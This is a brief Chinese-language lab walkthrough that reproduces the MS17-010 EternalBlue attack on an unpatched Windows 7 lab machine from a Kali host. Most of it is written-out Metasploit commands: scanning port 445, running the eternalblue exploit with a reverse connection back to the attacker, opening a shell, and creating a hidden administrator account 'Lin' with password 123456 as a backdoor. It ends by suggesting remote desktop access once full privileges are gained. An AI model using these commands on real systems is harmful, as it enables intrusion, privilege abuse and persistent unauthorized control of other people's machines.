漏洞利用445端口___MS17-010永恒之蓝复现

靶机 192.168.118.133 （关闭防火墙，没打补丁）
攻击机 kali 192.168.118.147

1.扫描主机，发现目标主机445端口打开着

2.利用msfconsole攻击

搜索ms17-010 查看漏洞模块 可以看到辅助模块auxiliary，攻击模块exploit

使用辅助模块 use auxiliary/scanner/smb/smb_ms17_010
查看配置，看下需要配置啥 show options

这里就看到了rhosts没配置，也就是目标靶机
设置一下：set rhost 192.168.118.133
设置完run一下，系统为windows 7 旗舰版 64位 存在ms17-010

使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue
查看配置，show options

需要配置lhost set lhost 192.168.118.147（攻击机）
Run一下开始攻击

查看目标主机系统信息

Shell，连接后门，拿到控制台shell
创建用户Lin 密码123456。Net user Lin 123456 /add
添加到本地管理员组 net localgroup administrators Lin /add

查看win7管理员 net localgroup administrators
查看到新加的Lin

之后呢，可以开启目标主机的3389端口，远程连接桌面后面就不再演示。拿到了最高权限，那基本你能想到的都能做到。